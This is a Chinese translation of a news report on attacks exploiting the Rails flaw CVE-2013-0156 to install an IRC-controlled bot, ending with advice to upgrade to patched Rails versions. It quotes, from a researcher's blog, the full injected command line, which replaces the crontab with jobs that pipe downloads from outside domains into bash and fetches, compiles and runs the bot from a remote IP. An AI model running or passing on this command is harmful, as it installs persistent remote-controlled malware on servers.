在過去的幾天里，攻擊者已經(jīng)越來越多地試圖通過一個 Rails 框架的安全漏洞來攻陷服務(wù)器。成功的入侵者在服務(wù)器上安裝一個機(jī)器人，使其等到來自 IRC 頻道的進(jìn)一步指示。

在安全專家 Jeff Jarmoc 的博客中寫到，攻擊者是通過 CVE 2013-0156 漏洞試圖攻擊的。盡管該漏洞已經(jīng)在1月份時關(guān)閉，但還有相當(dāng)多的服務(wù)器仍然運(yùn)行過時的 Ruby 版本。Jarmoc 稱攻擊者嘗試注入如下命令：

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

這導(dǎo)致系統(tǒng)自動下載 bot (k.c) 編譯然后執(zhí)行，Jarmoc 在其博客上也公布了該機(jī)器人程序的源碼。“k” 嘗試聯(lián)系位于 cvv4you.ru 域的 IRC 服務(wù)器，然后加入 #rails 頻道，在這里等待進(jìn)一步的攻擊指令。Jarmoc 稱 k 程序可通過指令下載并執(zhí)行任意代碼。目前該 IRC 服務(wù)器已經(jīng)能夠不可用，至少現(xiàn)在的地址是不可用的。

該機(jī)器人程序在進(jìn)程列表中顯示為 "- bash" ，啟動時會同時創(chuàng)建一個 /tmp/tan.pid 文件以確保同一時間只有一個進(jìn)程實(shí)例運(yùn)行。所有使用 Rails 框架的用戶應(yīng)該確認(rèn)正在使用當(dāng)前的 Rails 版本，當(dāng)前可靠的版本包括：3.2.13, 3.1.12 and 2.3.18.

英文原文： h-online

譯文鏈接：http://www.oschina.net/news/40942/attack-wave-on-ruby-on-rails